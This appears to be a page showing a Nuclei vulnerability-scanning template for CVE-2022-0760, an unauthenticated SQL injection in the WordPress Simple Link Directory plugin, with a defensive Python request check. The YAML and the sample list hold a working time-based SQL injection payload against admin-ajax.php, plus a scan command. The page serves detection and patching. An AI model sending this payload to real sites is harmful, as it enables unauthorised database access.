WordPress Simple Link Directory <7.7.2 - SQL injection
ID: CVE-2022-0760
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud
Description
WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
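A defender-side check built from the description above, added here as an example and not part of the template or the plugin: it classifies urlencoded admin-ajax.php POST bodies and flags qcopd_upvote_action requests whose post_id is not a plain integer. The function name, the sample bodies and the rule that a valid post ID is a short run of ASCII digits are assumptions of this example.

```python
from urllib.parse import parse_qsl

# Values from the advisory: the AJAX action and the injectable parameter.
ACTION = "qcopd_upvote_action"
PARAM = "post_id"


def check_body(body: str) -> str:
    """Classify one urlencoded admin-ajax.php POST body.

    Returns "ignore" (other action), "ok" (numeric post_id) or
    "suspicious" (post_id missing, repeated, array-style or non-numeric).
    """
    # parse_qsl percent-decodes and keeps duplicates, so encoded values
    # and repeated parameters are both visible to the check.
    pairs = parse_qsl(body, keep_blank_values=True)
    actions = [v for k, v in pairs if k == "action"]
    if ACTION not in actions:
        return "ignore"
    # PHP folds post_id[] / post_id[x] into the same parameter as an array.
    array_style = any(k.startswith(PARAM + "[") for k, _ in pairs)
    ids = [v for k, v in pairs if k == PARAM]
    if array_style or len(ids) != 1:
        return "suspicious"
    value = ids[0]
    # Assumption: a WordPress post ID is 1-20 ASCII digits, nothing else.
    if value.isascii() and value.isdigit() and len(value) <= 20:
        return "ok"
    return "suspicious"


# Constructed sample bodies (not captured traffic); the fourth reuses
# the probe string from the template on this page.
SAMPLES = [
    "action=qcopd_upvote_action&post_id=42",
    "action=heartbeat&post_id=abc",
    "action=qcopd_upvote_action&post_id=42%20OR%201%3D1",
    "action=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)",
    "action=qcopd_upvote_action&post_id[]=42",
    "action=qcopd_upvote_action&post_id=1&post_id=2",
    "action=qcopd_upvote_action",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(f"{check_body(body):10} {body}")
```

The same allow-list rule can be applied in a WAF or reverse proxy in front of sites that cannot be updated to 7.7.2 immediately.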
YAML Source
id: CVE-2022-0760

info:
  name: WordPress Simple Link Directory <7.7.2 - SQL injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Simple Link Directory plugin before 7.7.2 contains a SQL injection vulnerability. The plugin does not validate and escape the post_id parameter before using it in a SQL statement via the qcopd_upvote_action AJAX action, available to unauthenticated and authenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the WordPress site.
  remediation: |
    Update to the latest version of WordPress Simple Link Directory plugin (7.7.2 or higher) to mitigate the SQL injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1c83ed73-ef02-45c0-a9ab-68a3468d2210
    - https://wordpress.org/plugins/simple-link-directory/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0760
    - https://plugins.trac.wordpress.org/changeset/2684915
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0760
    cwe-id: CWE-89
    epss-score: 0.02788
    epss-percentile: 0.89602
    cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: quantumcloud
    product: simple_link_directory
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,sqli,wordpress,wp-plugin,wp,simple-link-directory,unauth,wpscan,quantumcloud

http:
  - raw:
      - |
        @timeout 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200 || status_code == 500'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "vote_status") || contains(body, "critical error")'
        condition: and
# digest: 4b0a00483046022100ef2ae601a859a101200769a2a461be82b4bac3f147011233d2dc942d409817b4022100d5ebe41b4ab6cfd874e45c04d0054d2b3c447a420978181b353cbe10a54d8753:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0760.yaml"